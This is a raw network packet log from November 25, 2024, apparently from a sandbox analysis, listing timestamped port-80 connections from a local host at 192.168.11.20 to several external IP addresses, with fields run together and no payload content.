                                                                                Nov 25, 2024 12:00:03.227790117 CET8049781104.21.27.59192.168.11.20
                                                                                Nov 25, 2024 12:00:03.227993965 CET4978180192.168.11.20104.21.27.59
                                                                                Nov 25, 2024 12:00:04.374325991 CET4978180192.168.11.20104.21.27.59
                                                                                Nov 25, 2024 12:00:05.390371084 CET4978280192.168.11.20104.21.27.59
                                                                                Nov 25, 2024 12:00:05.487399101 CET8049782104.21.27.59192.168.11.20
                                                                                Nov 25, 2024 12:00:05.487612009 CET4978280192.168.11.20104.21.27.59
                                                                                Nov 25, 2024 12:00:05.489787102 CET4978280192.168.11.20104.21.27.59
                                                                                Nov 25, 2024 12:00:05.586735010 CET8049782104.21.27.59192.168.11.20
                                                                                Nov 25, 2024 12:00:05.860534906 CET8049782104.21.27.59192.168.11.20
                                                                                Nov 25, 2024 12:00:05.860546112 CET8049782104.21.27.59192.168.11.20
                                                                                Nov 25, 2024 12:00:05.860553980 CET8049782104.21.27.59192.168.11.20
                                                                                Nov 25, 2024 12:00:05.860877037 CET4978280192.168.11.20104.21.27.59
                                                                                Nov 25, 2024 12:00:05.861143112 CET8049782104.21.27.59192.168.11.20
                                                                                Nov 25, 2024 12:00:05.861341953 CET4978280192.168.11.20104.21.27.59
                                                                                Nov 25, 2024 12:00:05.861998081 CET4978280192.168.11.20104.21.27.59
                                                                                Nov 25, 2024 12:00:05.958822012 CET8049782104.21.27.59192.168.11.20
                                                                                Nov 25, 2024 12:00:11.057940960 CET4978380192.168.11.2045.81.23.25
                                                                                Nov 25, 2024 12:00:11.230879068 CET804978345.81.23.25192.168.11.20
                                                                                Nov 25, 2024 12:00:11.231127024 CET4978380192.168.11.2045.81.23.25
                                                                                Nov 25, 2024 12:00:11.234292984 CET4978380192.168.11.2045.81.23.25
                                                                                Nov 25, 2024 12:00:11.406830072 CET804978345.81.23.25192.168.11.20
                                                                                Nov 25, 2024 12:00:11.407145023 CET804978345.81.23.25192.168.11.20
                                                                                Nov 25, 2024 12:00:11.407193899 CET804978345.81.23.25192.168.11.20
                                                                                Nov 25, 2024 12:00:11.407437086 CET4978380192.168.11.2045.81.23.25
                                                                                Nov 25, 2024 12:00:12.747550964 CET4978380192.168.11.2045.81.23.25
                                                                                Nov 25, 2024 12:00:13.763533115 CET4978480192.168.11.2045.81.23.25
                                                                                Nov 25, 2024 12:00:13.936059952 CET804978445.81.23.25192.168.11.20
                                                                                Nov 25, 2024 12:00:13.936232090 CET4978480192.168.11.2045.81.23.25
                                                                                Nov 25, 2024 12:00:13.941138029 CET4978480192.168.11.2045.81.23.25
                                                                                Nov 25, 2024 12:00:14.113533974 CET804978445.81.23.25192.168.11.20
                                                                                Nov 25, 2024 12:00:14.113862991 CET804978445.81.23.25192.168.11.20
                                                                                Nov 25, 2024 12:00:14.113883018 CET804978445.81.23.25192.168.11.20
                                                                                Nov 25, 2024 12:00:14.114085913 CET4978480192.168.11.2045.81.23.25
                                                                                Nov 25, 2024 12:00:15.450010061 CET4978480192.168.11.2045.81.23.25
                                                                                Nov 25, 2024 12:00:16.466099024 CET4978580192.168.11.2045.81.23.25
                                                                                Nov 25, 2024 12:00:16.645589113 CET804978545.81.23.25192.168.11.20
                                                                                Nov 25, 2024 12:00:16.645798922 CET4978580192.168.11.2045.81.23.25
                                                                                Nov 25, 2024 12:00:16.649075031 CET4978580192.168.11.2045.81.23.25
                                                                                Nov 25, 2024 12:00:16.649123907 CET4978580192.168.11.2045.81.23.25
                                                                                Nov 25, 2024 12:00:16.821458101 CET804978545.81.23.25192.168.11.20
                                                                                Nov 25, 2024 12:00:16.821474075 CET804978545.81.23.25192.168.11.20
                                                                                Nov 25, 2024 12:00:16.821479082 CET804978545.81.23.25192.168.11.20
                                                                                Nov 25, 2024 12:00:16.821680069 CET804978545.81.23.25192.168.11.20
                                                                                Nov 25, 2024 12:00:16.821687937 CET804978545.81.23.25192.168.11.20
                                                                                Nov 25, 2024 12:00:16.821692944 CET804978545.81.23.25192.168.11.20
                                                                                Nov 25, 2024 12:00:16.821698904 CET804978545.81.23.25192.168.11.20
                                                                                Nov 25, 2024 12:00:16.821852922 CET804978545.81.23.25192.168.11.20
                                                                                Nov 25, 2024 12:00:16.821861029 CET804978545.81.23.25192.168.11.20
                                                                                Nov 25, 2024 12:00:16.821996927 CET4978580192.168.11.2045.81.23.25
                                                                                Nov 25, 2024 12:00:18.152601004 CET4978580192.168.11.2045.81.23.25
                                                                                Nov 25, 2024 12:00:19.168854952 CET4978680192.168.11.2045.81.23.25
                                                                                Nov 25, 2024 12:00:19.342269897 CET804978645.81.23.25192.168.11.20
                                                                                Nov 25, 2024 12:00:19.342597961 CET4978680192.168.11.2045.81.23.25
                                                                                Nov 25, 2024 12:00:19.344767094 CET4978680192.168.11.2045.81.23.25
                                                                                Nov 25, 2024 12:00:19.517265081 CET804978645.81.23.25192.168.11.20
                                                                                Nov 25, 2024 12:00:19.517625093 CET804978645.81.23.25192.168.11.20
                                                                                Nov 25, 2024 12:00:19.517671108 CET804978645.81.23.25192.168.11.20
                                                                                Nov 25, 2024 12:00:19.517987967 CET4978680192.168.11.2045.81.23.25
                                                                                Nov 25, 2024 12:00:19.518598080 CET4978680192.168.11.2045.81.23.25
                                                                                Nov 25, 2024 12:00:19.695655107 CET804978645.81.23.25192.168.11.20
                                                                                Nov 25, 2024 12:00:32.787935972 CET4978780192.168.11.2013.248.169.48
                                                                                Nov 25, 2024 12:00:32.893779039 CET804978713.248.169.48192.168.11.20
                                                                                Nov 25, 2024 12:00:32.893970966 CET4978780192.168.11.2013.248.169.48
                                                                                Nov 25, 2024 12:00:32.897140980 CET4978780192.168.11.2013.248.169.48
                                                                                Nov 25, 2024 12:00:33.001636028 CET804978713.248.169.48192.168.11.20
                                                                                Nov 25, 2024 12:00:33.001730919 CET804978713.248.169.48192.168.11.20
                                                                                Nov 25, 2024 12:00:33.001843929 CET4978780192.168.11.2013.248.169.48
                                                                                Nov 25, 2024 12:00:34.398977995 CET4978780192.168.11.2013.248.169.48
                                                                                Nov 25, 2024 12:00:34.503537893 CET804978713.248.169.48192.168.11.20
                                                                                Nov 25, 2024 12:00:35.415052891 CET4978880192.168.11.2013.248.169.48
                                                                                Nov 25, 2024 12:00:35.520659924 CET804978813.248.169.48192.168.11.20
                                                                                Nov 25, 2024 12:00:35.520890951 CET4978880192.168.11.2013.248.169.48
                                                                                Nov 25, 2024 12:00:35.524068117 CET4978880192.168.11.2013.248.169.48
                                                                                Nov 25, 2024 12:00:35.627980947 CET804978813.248.169.48192.168.11.20
                                                                                Nov 25, 2024 12:00:35.628424883 CET804978813.248.169.48192.168.11.20
                                                                                Nov 25, 2024 12:00:35.628618002 CET4978880192.168.11.2013.248.169.48
                                                                                Nov 25, 2024 12:00:37.039010048 CET4978880192.168.11.2013.248.169.48
                                                                                Nov 25, 2024 12:00:37.142646074 CET804978813.248.169.48192.168.11.20
                                                                                Nov 25, 2024 12:00:38.055198908 CET4978980192.168.11.2013.248.169.48
                                                                                Nov 25, 2024 12:00:38.160692930 CET804978913.248.169.48192.168.11.20
                                                                                Nov 25, 2024 12:00:38.160890102 CET4978980192.168.11.2013.248.169.48
                                                                                Nov 25, 2024 12:00:38.164416075 CET4978980192.168.11.2013.248.169.48
                                                                                Nov 25, 2024 12:00:38.268273115 CET804978913.248.169.48192.168.11.20
                                                                                Nov 25, 2024 12:00:38.268315077 CET804978913.248.169.48192.168.11.20
                                                                                Nov 25, 2024 12:00:38.268383026 CET804978913.248.169.48192.168.11.20
                                                                                Nov 25, 2024 12:00:38.268412113 CET804978913.248.169.48192.168.11.20
                                                                                Nov 25, 2024 12:00:38.268531084 CET804978913.248.169.48192.168.11.20
                                                                                Nov 25, 2024 12:00:40.695282936 CET4979080192.168.11.2013.248.169.48
                                                                                Nov 25, 2024 12:00:40.800302982 CET804979013.248.169.48192.168.11.20
                                                                                Nov 25, 2024 12:00:40.800524950 CET4979080192.168.11.2013.248.169.48
                                                                                Nov 25, 2024 12:00:40.802793980 CET4979080192.168.11.2013.248.169.48
                                                                                Nov 25, 2024 12:00:40.906586885 CET804979013.248.169.48192.168.11.20
                                                                                Nov 25, 2024 12:00:40.907938004 CET804979013.248.169.48192.168.11.20
                                                                                Nov 25, 2024 12:00:40.907993078 CET804979013.248.169.48192.168.11.20
                                                                                Nov 25, 2024 12:00:40.908404112 CET4979080192.168.11.2013.248.169.48
                                                                                Nov 25, 2024 12:00:40.909024000 CET4979080192.168.11.2013.248.169.48
                                                                                Nov 25, 2024 12:00:41.012715101 CET804979013.248.169.48192.168.11.20
                                                                                Nov 25, 2024 12:00:57.139163971 CET4979180192.168.11.20195.110.124.133
                                                                                Nov 25, 2024 12:00:57.335758924 CET8049791195.110.124.133192.168.11.20
                                                                                Nov 25, 2024 12:00:57.336018085 CET4979180192.168.11.20195.110.124.133
                                                                                Nov 25, 2024 12:00:57.340029955 CET4979180192.168.11.20195.110.124.133
                                                                                Nov 25, 2024 12:00:57.536226034 CET8049791195.110.124.133192.168.11.20
                                                                                Nov 25, 2024 12:00:57.538007975 CET8049791195.110.124.133192.168.11.20
                                                                                Nov 25, 2024 12:00:57.538014889 CET8049791195.110.124.133192.168.11.20
                                                                                Nov 25, 2024 12:00:57.538289070 CET4979180192.168.11.20195.110.124.133
                                                                                Nov 25, 2024 12:00:57.538913012 CET4979180192.168.11.20195.110.124.133
                                                                                Nov 25, 2024 12:00:57.735937119 CET8049791195.110.124.133192.168.11.20
                                                                                Nov 25, 2024 12:01:02.549829006 CET4979280192.168.11.20172.67.145.234
                                                                                Nov 25, 2024 12:01:02.647073030 CET8049792172.67.145.234192.168.11.20
                                                                                Nov 25, 2024 12:01:02.647258043 CET4979280192.168.11.20172.67.145.234
                                                                                Nov 25, 2024 12:01:02.650437117 CET4979280192.168.11.20172.67.145.234
                                                                                Nov 25, 2024 12:01:02.747589111 CET8049792172.67.145.234192.168.11.20
                                                                                Nov 25, 2024 12:01:03.194276094 CET8049792172.67.145.234192.168.11.20
                                                                                Nov 25, 2024 12:01:03.194318056 CET8049792172.67.145.234192.168.11.20
                                                                                Nov 25, 2024 12:01:03.194457054 CET4979280192.168.11.20172.67.145.234
                                                                                Nov 25, 2024 12:01:03.194736958 CET8049792172.67.145.234192.168.11.20
                                                                                Nov 25, 2024 12:01:03.194861889 CET4979280192.168.11.20172.67.145.234
                                                                                Nov 25, 2024 12:01:04.158085108 CET4979280192.168.11.20172.67.145.234
                                                                                Nov 25, 2024 12:01:05.174144030 CET4979380192.168.11.20172.67.145.234
                                                                                Nov 25, 2024 12:01:05.271186113 CET8049793172.67.145.234192.168.11.20
                                                                                Nov 25, 2024 12:01:05.271434069 CET4979380192.168.11.20172.67.145.234
                                                                                Nov 25, 2024 12:01:05.274791956 CET4979380192.168.11.20172.67.145.234
                                                                                Nov 25, 2024 12:01:05.371896029 CET8049793172.67.145.234192.168.11.20
                                                                                Nov 25, 2024 12:01:05.526657104 CET8049793172.67.145.234192.168.11.20
                                                                                Nov 25, 2024 12:01:05.526724100 CET8049793172.67.145.234192.168.11.20
                                                                                Nov 25, 2024 12:01:05.526755095 CET8049793172.67.145.234192.168.11.20
                                                                                Nov 25, 2024 12:01:05.526905060 CET4979380192.168.11.20172.67.145.234
                                                                                Nov 25, 2024 12:01:05.527369022 CET8049793172.67.145.234192.168.11.20
                                                                                Nov 25, 2024 12:01:05.527580023 CET4979380192.168.11.20172.67.145.234
                                                                                Nov 25, 2024 12:01:06.782434940 CET4979380192.168.11.20172.67.145.234
                                                                                Nov 25, 2024 12:01:07.798599958 CET4979480192.168.11.20172.67.145.234
                                                                                Nov 25, 2024 12:01:07.896027088 CET8049794172.67.145.234192.168.11.20
                                                                                Nov 25, 2024 12:01:07.896244049 CET4979480192.168.11.20172.67.145.234
                                                                                Nov 25, 2024 12:01:07.899456024 CET4979480192.168.11.20172.67.145.234
                                                                                Nov 25, 2024 12:01:07.899480104 CET4979480192.168.11.20172.67.145.234
                                                                                Nov 25, 2024 12:01:07.899549961 CET4979480192.168.11.20172.67.145.234
                                                                                Nov 25, 2024 12:01:07.899728060 CET4979480192.168.11.20172.67.145.234
                                                                                Nov 25, 2024 12:01:07.997068882 CET8049794172.67.145.234192.168.11.20
                                                                                Nov 25, 2024 12:01:07.997077942 CET8049794172.67.145.234192.168.11.20
                                                                                Nov 25, 2024 12:01:07.997085094 CET8049794172.67.145.234192.168.11.20
                                                                                Nov 25, 2024 12:01:08.001092911 CET8049794172.67.145.234192.168.11.20
                                                                                Nov 25, 2024 12:01:08.453958035 CET8049794172.67.145.234192.168.11.20
                                                                                Nov 25, 2024 12:01:08.453968048 CET8049794172.67.145.234192.168.11.20
                                                                                Nov 25, 2024 12:01:08.454140902 CET4979480192.168.11.20172.67.145.234
                                                                                Nov 25, 2024 12:01:08.455140114 CET8049794172.67.145.234192.168.11.20
                                                                                Nov 25, 2024 12:01:08.455338001 CET4979480192.168.11.20172.67.145.234
                                                                                Nov 25, 2024 12:01:09.406934023 CET4979480192.168.11.20172.67.145.234
                                                                                Nov 25, 2024 12:01:10.423011065 CET4979580192.168.11.20172.67.145.234
                                                                                Nov 25, 2024 12:01:10.520190001 CET8049795172.67.145.234192.168.11.20
                                                                                Nov 25, 2024 12:01:10.520385027 CET4979580192.168.11.20172.67.145.234
                                                                                Nov 25, 2024 12:01:10.522569895 CET4979580192.168.11.20172.67.145.234
                                                                                Nov 25, 2024 12:01:10.619712114 CET8049795172.67.145.234192.168.11.20
                                                                                Nov 25, 2024 12:01:10.756262064 CET8049795172.67.145.234192.168.11.20
                                                                                Nov 25, 2024 12:01:10.756303072 CET8049795172.67.145.234192.168.11.20
                                                                                Nov 25, 2024 12:01:10.756632090 CET4979580192.168.11.20172.67.145.234
                                                                                Nov 25, 2024 12:01:10.756648064 CET8049795172.67.145.234192.168.11.20
                                                                                Nov 25, 2024 12:01:10.756865978 CET4979580192.168.11.20172.67.145.234
                                                                                Nov 25, 2024 12:01:10.757440090 CET4979580192.168.11.20172.67.145.234
                                                                                Nov 25, 2024 12:01:10.854579926 CET8049795172.67.145.234192.168.11.20
                                                                                Nov 25, 2024 12:01:15.765605927 CET4979680192.168.11.2013.248.169.48
                                                                                Nov 25, 2024 12:01:15.871301889 CET804979613.248.169.48192.168.11.20
                                                                                Nov 25, 2024 12:01:15.871515989 CET4979680192.168.11.2013.248.169.48
                                                                                Nov 25, 2024 12:01:15.874686003 CET4979680192.168.11.2013.248.169.48
                                                                                Nov 25, 2024 12:01:15.978756905 CET804979613.248.169.48192.168.11.20
                                                                                Nov 25, 2024 12:01:15.979284048 CET804979613.248.169.48192.168.11.20
                                                                                Nov 25, 2024 12:01:15.979445934 CET4979680192.168.11.2013.248.169.48
                                                                                Nov 25, 2024 12:01:17.389498949 CET4979680192.168.11.2013.248.169.48
                                                                                Nov 25, 2024 12:01:17.493891954 CET804979613.248.169.48192.168.11.20
                                                                                Nov 25, 2024 12:01:18.405654907 CET4979780192.168.11.2013.248.169.48
                                                                                Nov 25, 2024 12:01:18.511181116 CET804979713.248.169.48192.168.11.20
                                                                                Nov 25, 2024 12:01:18.511477947 CET4979780192.168.11.2013.248.169.48
                                                                                Nov 25, 2024 12:01:18.514669895 CET4979780192.168.11.2013.248.169.48
                                                                                Nov 25, 2024 12:01:18.618264914 CET804979713.248.169.48192.168.11.20
                                                                                Nov 25, 2024 12:01:18.618756056 CET804979713.248.169.48192.168.11.20
                                                                                Nov 25, 2024 12:01:18.618885040 CET4979780192.168.11.2013.248.169.48
                                                                                Nov 25, 2024 12:01:20.029551983 CET4979780192.168.11.2013.248.169.48
                                                                                Nov 25, 2024 12:01:20.133160114 CET804979713.248.169.48192.168.11.20
                                                                                Nov 25, 2024 12:01:21.045715094 CET4979880192.168.11.2013.248.169.48
                                                                                Nov 25, 2024 12:01:21.150471926 CET804979813.248.169.48192.168.11.20
                                                                                Nov 25, 2024 12:01:21.150677919 CET4979880192.168.11.2013.248.169.48
                                                                                Nov 25, 2024 12:01:21.153971910 CET4979880192.168.11.2013.248.169.48
                                                                                Nov 25, 2024 12:01:21.154037952 CET4979880192.168.11.2013.248.169.48
                                                                                Nov 25, 2024 12:01:21.257904053 CET804979813.248.169.48192.168.11.20
                                                                                Nov 25, 2024 12:01:21.257986069 CET804979813.248.169.48192.168.11.20
                                                                                Nov 25, 2024 12:01:21.258017063 CET804979813.248.169.48192.168.11.20
                                                                                Nov 25, 2024 12:01:21.258064985 CET804979813.248.169.48192.168.11.20
                                                                                Nov 25, 2024 12:01:21.258096933 CET804979813.248.169.48192.168.11.20
                                                                                Nov 25, 2024 12:01:21.258126974 CET804979813.248.169.48192.168.11.20
                                                                                Nov 25, 2024 12:01:21.258153915 CET804979813.248.169.48192.168.11.20
                                                                                Nov 25, 2024 12:01:23.685677052 CET4979980192.168.11.2013.248.169.48
                                                                                Nov 25, 2024 12:01:23.790093899 CET804979913.248.169.48192.168.11.20
                                                                                Nov 25, 2024 12:01:23.790249109 CET4979980192.168.11.2013.248.169.48
                                                                                Nov 25, 2024 12:01:23.792421103 CET4979980192.168.11.2013.248.169.48
                                                                                Nov 25, 2024 12:01:23.895837069 CET804979913.248.169.48192.168.11.20
                                                                                Nov 25, 2024 12:01:23.896320105 CET804979913.248.169.48192.168.11.20
                                                                                Nov 25, 2024 12:01:23.896364927 CET804979913.248.169.48192.168.11.20
                                                                                Nov 25, 2024 12:01:23.896682978 CET4979980192.168.11.2013.248.169.48
                                                                                Nov 25, 2024 12:01:23.897298098 CET4979980192.168.11.2013.248.169.48
                                                                                Nov 25, 2024 12:01:24.001149893 CET804979913.248.169.48192.168.11.20
                                                                                Nov 25, 2024 12:01:28.903366089 CET4980280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:29.116321087 CET804980231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:29.116525888 CET4980280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:29.123054981 CET4980280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:29.335495949 CET804980231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:29.365194082 CET804980231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:29.365242004 CET804980231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:29.365418911 CET804980231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:29.365454912 CET804980231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:29.365463018 CET4980280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:29.365617990 CET804980231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:29.365631104 CET4980280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:29.365720034 CET804980231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:29.365959883 CET4980280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:29.365978956 CET804980231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:29.366012096 CET804980231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:29.366092920 CET804980231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:29.366164923 CET804980231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:29.366312027 CET4980280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:29.366312027 CET4980280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:29.578191042 CET804980231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:29.578226089 CET804980231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:29.578411102 CET804980231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:29.578418970 CET4980280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:29.578447104 CET804980231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:29.578756094 CET4980280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:29.578763962 CET804980231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:29.578810930 CET804980231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:29.578994036 CET4980280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:29.579150915 CET804980231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:29.579197884 CET804980231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:29.579483986 CET804980231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:29.579520941 CET804980231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:29.579556942 CET4980280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:29.579560041 CET804980231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:29.579627037 CET804980231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:29.579714060 CET804980231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:29.579719067 CET4980280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:29.579871893 CET804980231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:29.579891920 CET4980280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:29.580058098 CET4980280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:29.580188036 CET804980231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:29.580221891 CET804980231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:29.580406904 CET804980231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:29.580519915 CET804980231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:29.580562115 CET4980280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:29.580640078 CET804980231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:29.580672979 CET804980231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:29.580708981 CET4980280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:29.581079960 CET4980280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:29.791002035 CET804980231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:29.791043043 CET804980231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:29.791071892 CET804980231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:29.791109085 CET804980231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:29.791235924 CET4980280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:29.791333914 CET804980231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:29.791394949 CET804980231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:29.791471004 CET4980280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:29.791491985 CET804980231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:29.791562080 CET804980231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:29.791650057 CET4980280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:29.791806936 CET804980231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:29.791815042 CET4980280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:29.791841984 CET804980231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:29.792151928 CET4980280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:29.792306900 CET804980231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:29.792340994 CET804980231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:29.792532921 CET4980280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:29.792701960 CET804980231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:29.792748928 CET804980231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:29.792777061 CET804980231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:29.792855978 CET804980231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:29.792932987 CET4980280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:29.793160915 CET4980280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:29.793495893 CET804980231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:29.793538094 CET804980231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:29.793692112 CET4980280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:29.793725967 CET804980231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:29.793791056 CET804980231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:29.793956041 CET4980280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:29.794027090 CET804980231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:29.794061899 CET804980231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:29.794179916 CET804980231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:29.794207096 CET804980231.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:29.794262886 CET4980280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:29.794430017 CET4980280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:30.636658907 CET4980280192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:31.652745008 CET4980380192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:31.871992111 CET804980331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:31.872162104 CET4980380192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:31.878174067 CET4980380192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:32.097587109 CET804980331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:32.128256083 CET804980331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:32.128290892 CET804980331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:32.128318071 CET804980331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:32.128405094 CET4980380192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:32.128412008 CET804980331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:32.128561020 CET804980331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:32.128571987 CET4980380192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:32.128662109 CET804980331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:32.128691912 CET804980331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:32.128763914 CET804980331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:32.128979921 CET804980331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:32.128993034 CET4980380192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:32.128993034 CET4980380192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:32.129014015 CET804980331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:32.129332066 CET4980380192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:32.347213030 CET804980331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:32.347249031 CET804980331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:32.347429037 CET804980331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:32.347443104 CET4980380192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:32.347475052 CET804980331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:32.347647905 CET804980331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:32.347673893 CET4980380192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:32.347676992 CET804980331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:32.347896099 CET804980331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:32.348018885 CET4980380192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:32.348026037 CET804980331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:32.348227978 CET804980331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:32.348262072 CET804980331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:32.348361969 CET4980380192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:32.348525047 CET4980380192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:32.348555088 CET804980331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:32.348658085 CET804980331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:32.348776102 CET804980331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:32.348825932 CET804980331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:32.348869085 CET4980380192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:32.349092007 CET804980331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:32.349102020 CET4980380192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:32.349138021 CET804980331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:32.349317074 CET804980331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:32.349419117 CET4980380192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:32.349427938 CET804980331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:32.349626064 CET804980331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:32.349636078 CET4980380192.168.11.2031.31.196.177
                                                                                Nov 25, 2024 12:01:32.349745989 CET804980331.31.196.177192.168.11.20
                                                                                Nov 25, 2024 12:01:32.349977016 CET4980380192.168.11.2031.31.196.177
